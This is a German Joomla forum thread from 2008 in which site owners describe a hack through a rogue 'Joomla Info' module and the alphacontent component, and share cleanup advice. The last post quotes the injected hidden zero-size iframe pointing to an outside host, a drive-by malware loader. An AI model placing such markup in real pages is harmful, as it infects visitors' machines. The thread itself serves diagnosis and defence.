|
Premium Supporter
Registriert seit: 12.03.2006
Ort: Dresden
Beiträge: 5,620
Bedankte sich: 88 1,295 Danksagungen in 1,213 Beiträgen |
Bei mir bringt die Suche u.a. diesen Link: http://www.joomlaportal.de/sicherhei...stats-php.info
Edit: Ups, sehe gerade, daß Du diesen Thread ja schon gefunden hast. Hatte jetzt kurzzeitig die Ü verloren in dem Fensterwirrwarr. Und nein, mit der Deaktivierung des Moduls ist es nicht getan, da der Schadcode bereits implementiert wurde und auf das Modul nicht mehr angewiesen ist. Edit 2: rickkp hat alle nötigen Schritte genannt. Was genau ist denn unklar daran? Geändert von keraM (10.01.2008 um 19:49 Uhr). Grund: Edit |
|
|
|
|
Joomla Newbie
Registriert seit: 06.05.2007
Ort: Düsseldorf
Beiträge: 7
Bedankte sich: 1 0 Danksagungen in 0 Beiträgen |
Zitat:
Google half zuerst einmal mit einem Verweis auf diesen Beitrag Ein Blick in den Seitenquelltext führte zu der Erkenntnis, das die böse Zeile: Code:
Code:
Ein Blick in die Liste der Module, die auf der Position 'left' erscheinen sollen, führte dann schnell zu einem Eintrag 'Custom Module' mit dem Titel: 'Joomla Info'. Nachdem ich dieses Modul deaktiviert hatte, war die Wanze verschwunden. Es bleiben allerdings einige offene Fragen:
__________________
Peter |
|
|
|
|
|
Joomlaking
Registriert seit: 08.03.2007
Beiträge: 734
Bedankte sich: 10 189 Danksagungen in 168 Beiträgen |
Du wirst entweder unsichere Komponenten am laufen haben, die Rechte deiner Ordner und Dateien falsch gesetzt oder die allgemeinen Sicherheitsregeln zu register globals - magic quotes usw nicht beachtet haben.
Schau dir meine Signatur an und dieses Forum Sicherheit. Vergleiche die Komponenten mit deinen installierten und befolge die Sicherheitshinweise die hier empfohlen werden.
__________________
Hilfe gibt es unter Angabe von: Hoster, Joomla Version, Installierte Komponenten, PHPInfo, Problembeschreibung Joomla 1.5 Anleitung - CHMOD Verzeichnisse 755 | Dateien 644 | 777 du wirst gehackt! Info: Privat Support nur gegen Vorkasse |
|
|
|
|
Joomla Newbie
Registriert seit: 06.05.2007
Ort: Düsseldorf
Beiträge: 7
Bedankte sich: 1 0 Danksagungen in 0 Beiträgen |
Zitat:
Zitat:
Die logs zeigen einen verdächtigen Angriffsversuch, nämlich: Code:
Bei dem Versuch diese URL einzugeben, kam dann auch die Meldung "Restricted Access" Noch immer ein wenig unsicher... Peter
__________________
Peter |
||
|
|
|
|
Joomlapapst
Registriert seit: 06.08.2006
Beiträge: 830
Bedankte sich: 2 163 Danksagungen in 152 Beiträgen |
Zitat:
Daher gebe ich immer den Tip die komplette Seite zu löschen und neu aufzuspielen. Die Dateien die arbeit machen (Template usw.) von Hand überprüfen, genauso wie die DB. Poste mal den relevanten Teil (register_globals usw) Deiner php Konfiguration. Die 200 hinten an der Zeile besagt nur das der Aufruf erfolgreich war, ob es auch möglich war Code einzuschleußen lässt sich so nicht sagen. |
|
|
|
|
| Erhielt Danksagungen von: |
|
Joomla Supporter
Registriert seit: 04.12.2005
Ort: Schwalmstadt
Beiträge: 107
Bedankte sich: 31 5 Danksagungen in 5 Beiträgen |
Bei mir war wohl alphacontent 2.5.5 das Einfallstor. Es wurde ebenfalls ein Modul "Joomla Info" erstellt, welches dann den Code aus Beitrag 6 auf allen Seiten einfügte. Scheinbar wurde auch 'RG_EMULATION' in der globals.php auf 1 / ON gestellt.
In components/com_alphacontent habe ich dann eine Datei gefunden, die dort nicht hingehört: alphacontent.inc.php. Knapp 2500 Zeilen Code, meine PHP Kenntnisse reichen aber nicht aus um zu sagen, was dieses Script alles macht... Nachtrag: Im Bereich des Footer meines Templates (firestarter) habe ich weiteren Code gefunden: <iframe src="http://in-in.in/in/" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></ Als ich die betroffene index.php im Dreamweaver geöffnet habe, ist mein Rechner automatisch runtergefahren und mit einer Boot Virus Warnung neu gestartet. Meine Empfehlung: Den Scheiß nur in einem reinen Text-Editor öffnen! Die befallenen Dateien hatten das selbe Datum in WS_FTP. Konfiguration: Joomla 1.0.12 mit alphacontent 2.5.5 (werde ich jetzt beides updaten) |
|
|
|
| Werbung |